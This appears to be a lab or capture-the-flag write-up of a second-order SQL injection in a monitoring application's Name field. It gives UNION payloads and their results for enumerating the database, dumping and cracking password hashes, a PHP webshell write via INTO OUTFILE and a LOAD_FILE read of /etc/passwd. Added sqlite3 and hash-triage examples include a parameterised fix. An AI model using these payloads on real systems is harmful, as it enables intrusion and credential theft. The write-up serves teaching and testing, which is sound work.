SQL Injection
A SQL injection vulnerability is present in the Name field of the target MONITORING CONTROL application.
The backend appears to read the stored Name value without any sanitization and splice it into a SQL query that a scheduled job executes every minute. The payload is therefore stored first and fires later (a stored, second-order injection), and every probe costs up to a minute.
Given how slow that makes each round trip, complete enumeration is not advisable. The priority is exfiltrating key data and getting code execution.
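The stored-then-executed flow described above, as an added example that is not the target application's code: a sqlite3 stand-in with a constructed schema (tables `monitors` and `users`, names and rows all made up), a form handler that stores the Name safely, the per-minute job that splices the stored name into SQL (the vulnerable shape), the same job with a bound parameter, and a column-count probe that replays the page's first step. The stand-in quotes with `'`, so the payloads use `'` where the page uses `"`; the mechanics are identical.

```python
"""Second-order SQL injection through a stored Name field, modelled with sqlite3.

Added example, not the MONITORING CONTROL application's code. Schema, rows and
the single-quoted query are constructed for the demo.
"""
import sqlite3
from typing import List, Optional, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed stand-in for the monitoring database."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE users (username TEXT, password TEXT);
        CREATE TABLE monitors (name TEXT, url TEXT, status TEXT, checked_at TEXT);
        INSERT INTO users VALUES ('admin', '$2y$12$constructed-hash-a'),
                                 ('otis',  '$2y$12$constructed-hash-b');
        INSERT INTO monitors VALUES ('web01', 'http://web01/', 'up', '2020-01-01 00:00');
        """
    )
    return db


def add_monitor(db: sqlite3.Connection, name: str, url: str) -> None:
    """The form handler. It is parameterised, so the payload is stored as plain data;
    nothing looks wrong at this layer."""
    db.execute("INSERT INTO monitors VALUES (?, ?, 'unknown', NULL)", (name, url))


def run_checks_vulnerable(db: sqlite3.Connection) -> List[Tuple]:
    """The per-minute job: re-reads each stored name and splices it into SQL.
    This is where the stored payload turns into live SQL (second-order injection)."""
    rows = []
    for (name,) in db.execute("SELECT name FROM monitors").fetchall():
        sql = f"SELECT name, url, status, checked_at FROM monitors WHERE name = '{name}'"
        rows.extend(db.execute(sql).fetchall())
    return rows


def run_checks_fixed(db: sqlite3.Connection) -> List[Tuple]:
    """Same job with a bound parameter: the stored name is compared, never parsed."""
    rows = []
    for (name,) in db.execute("SELECT name FROM monitors").fetchall():
        sql = "SELECT name, url, status, checked_at FROM monitors WHERE name = ?"
        rows.extend(db.execute(sql, (name,)).fetchall())
    return rows


def find_column_count(db: sqlite3.Connection, max_cols: int = 8) -> Optional[int]:
    """Replays the page's first step: UNION SELECT 1..n until the column counts agree.
    A mismatch raises OperationalError, so the first width that runs is the answer."""
    for n in range(1, max_cols + 1):
        probe = "' UNION SELECT " + ",".join(str(i) for i in range(1, n + 1)) + " -- -"
        add_monitor(db, probe, "probe://")
        try:
            run_checks_vulnerable(db)
            return n
        except sqlite3.OperationalError:
            pass  # column-count mismatch: try the next width
        finally:
            db.execute("DELETE FROM monitors WHERE url = 'probe://'")
    return None


# Same shape as the page's credential dump, with the demo's quote character.
DUMP_PAYLOAD = "' UNION SELECT username, password, 3, 4 FROM users -- -"


def demo() -> Tuple[List[Tuple], List[Tuple]]:
    """Store the dump payload once, then run both versions of the job over it."""
    db = build_db()
    add_monitor(db, DUMP_PAYLOAD, "http://attacker/")
    return run_checks_vulnerable(db), run_checks_fixed(db)


if __name__ == "__main__":
    print("columns:", find_column_count(build_db()))
    vuln, fixed = demo()
    print("vulnerable job returned:", vuln)
    print("fixed job returned:", fixed)
```

The point worth noticing is that the insert is already parameterised; auditing only the request handler would miss this bug, because the dangerous concatenation lives in the scheduled job that reads the value back.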
The application displays 4 columns, which suggests the query returns at least 4 columns.
Payload: `" UNION SELECT 1,2,3,4 -- -`
Result: the query runs without error, so there are 4 columns.
Databases
Payload: `" UNION SELECT schema_name,2,3,4 FROM information_schema.schemata -- -`
Result:
- information_schema
- monitoring
- mysql
- performance_schema
monitoring DB
Payload: `" UNION SELECT table_name,2,3,4 FROM information_schema.tables WHERE table_schema="monitoring" -- -`
Result:
- monitoring.users table
Payload: `" UNION SELECT column_name,2,3,4 FROM information_schema.columns WHERE table_schema="monitoring" AND table_name="users" -- -`
Result:
- monitoring.users.username
- monitoring.users.password
monitoring.users Table Credential Exfiltration
Payload: `" UNION SELECT username,password,3,4 FROM monitoring.users -- -`
Result:
- admin: `$2y$12$huPSQmbcMvgHDkWIMnk9t.1cLoBWue3dtHf9E5cKUNcfKTOOp8cma`
- nicholas: `$2y$12$4R6JiYMbJ7NKnuQEoQW4ruIcuRJtDRukH.Tvx52RkUfx5eloIw7Qe`
- otis: `$2y$12$./XCeHl0/TCPW5zN/E9w0ecUUKbDomwjQ0yZqGz5tgASgZg6SIHFW`
These are bcrypt hashes; the `$2y$` prefix is the variant produced by PHP's password_hash() (hashcat mode 3200), and the cost factor 12 makes every guess expensive.
hashcat was unable to crack them, except for the otis hash, which confirms the already known password 123456.
mysql.user Table Credential Exfiltration
Payload: `" UNION SELECT user,password,authentication_string,4 FROM mysql.user -- -`
Result:
- root: `CDA244FF510B063DA17DFF84FF39BA0849F7920F`. This hash could not be cracked.
- elliot: the password column is empty; the value `5A5749F309CAC33B27BA94EE02168FA3C3E7A3E9` comes from the authentication_string column.
Both values are 40-character hex MySQL native hashes (`mysql_native_password`, SHA1(SHA1(password)), unsalted). hashcat mode 300 takes them as shown, without the leading `*` that mysql.user normally displays.
Password Cracking
Password hash cracked for the elliot user: elliot123
Next step: validate it against the target SSH server.
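Triage of the two hash formats found in the monitoring.users and mysql.user dumps above, as an added example (not from the page or the target system): it classifies each value, maps it to the hashcat mode, and re-checks a candidate against the MySQL native format offline, which is why the bcrypt cost-12 hashes resisted hashcat while the mysql.user hash fell quickly. The hash values are copied from the dumps; the regexes, function names and the `constructed-pw` value are assumptions added here.

```python
"""Identify the dumped hash formats and check the MySQL native one offline.

Added example, not code from the page or the target. Hash values below are the
ones dumped above; everything else is constructed for the demo.
"""
import hashlib
import re
from typing import Dict, Optional, Tuple

# Copied from the dumps above (monitoring.users, then mysql.user).
DUMPED = {
    "admin": "$2y$12$huPSQmbcMvgHDkWIMnk9t.1cLoBWue3dtHf9E5cKUNcfKTOOp8cma",
    "nicholas": "$2y$12$4R6JiYMbJ7NKnuQEoQW4ruIcuRJtDRukH.Tvx52RkUfx5eloIw7Qe",
    "otis": "$2y$12$./XCeHl0/TCPW5zN/E9w0ecUUKbDomwjQ0yZqGz5tgASgZg6SIHFW",
    "root": "CDA244FF510B063DA17DFF84FF39BA0849F7920F",
    "elliot": "5A5749F309CAC33B27BA94EE02168FA3C3E7A3E9",
}

# $2y$ is bcrypt as written by PHP's password_hash(): cost, then 22-char salt + 31-char digest.
BCRYPT_RE = re.compile(r"^\$2[abxy]\$(\d{2})\$[./A-Za-z0-9]{53}$")
# mysql_native_password: 40 hex chars, usually shown with a leading '*' in mysql.user.
MYSQL_NATIVE_RE = re.compile(r"^\*?[0-9A-Fa-f]{40}$")

HASHCAT_MODE = {"bcrypt": 3200, "mysql-native": 300}


def identify(h: str) -> Tuple[str, Optional[int]]:
    """Return (format, bcrypt cost or None) for one stored hash."""
    m = BCRYPT_RE.match(h)
    if m:
        return "bcrypt", int(m.group(1))
    if MYSQL_NATIVE_RE.match(h):
        return "mysql-native", None
    return "unknown", None


def mysql_native_hash(password: str) -> str:
    """'*' + SHA1(SHA1(password)) as upper-case hex: unsalted and fast, hence crackable."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def mysql_native_verify(password: str, stored: str) -> bool:
    """Compare a candidate against a mysql.user value, with or without the '*'."""
    return mysql_native_hash(password) == "*" + stored.lstrip("*").upper()


def triage(dump: Dict[str, str]) -> Dict[str, Tuple[str, Optional[int], Optional[int]]]:
    """Map each account to (format, hashcat mode, bcrypt cost) so slow targets stand out."""
    out = {}
    for user, h in dump.items():
        fmt, cost = identify(h)
        out[user] = (fmt, HASHCAT_MODE.get(fmt), cost)
    return out


if __name__ == "__main__":
    for user, info in triage(DUMPED).items():
        print(f"{user:9} {info}")
    # Offline re-check of the value hashcat reported for elliot; prints the comparison result.
    print("elliot123 matches elliot's hash:", mysql_native_verify("elliot123", DUMPED["elliot"]))
```

A mysql.user hash is two unsalted SHA-1 rounds, so a wordlist run against it finishes in seconds; bcrypt at cost 12 costs thousands of block-cipher setups per guess, which is why only the password already known for otis came back.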
phpMyAdmin
Since the password column is empty, I should be able to authenticate to the target phpMyAdmin instance using only the username elliot.
Successfully authenticated as the elliot user.
Unfortunately, nothing can be done from here due to the lack of privileges.
File Write
Payloads tried:
- `" UNION SELECT "<?php system($_GET['cmd']); ?>",2,3,4 INTO OUTFILE "/var/www/html/webshell.php" -- -`
- `" UNION SELECT '<?php system($_GET["cmd"]); ?>',2,3,4 INTO OUTFILE '/var/www/html/webshell.php' -- -`
Neither produced a file; file write appears impossible. The usual blockers for INTO OUTFILE are the database user lacking the FILE privilege, secure_file_priv restricting or disabling output, and the target directory not being writable by the mysqld process (or being denied by AppArmor). The two quoting variants rule out a simple quoting mistake, not those server-side limits.
File Read
Payload: `" UNION SELECT LOAD_FILE('/etc/passwd'),2,3,4 -- -`
Result: file read is possible.
Based on the /etc/passwd contents, all the users exfiltrated above are valid system accounts.
Since LOAD_FILE requires the same FILE privilege and obeys the same secure_file_priv setting as INTO OUTFILE, the failed file write is most likely due to /var/www/html not being writable by the mysqld process rather than a missing privilege.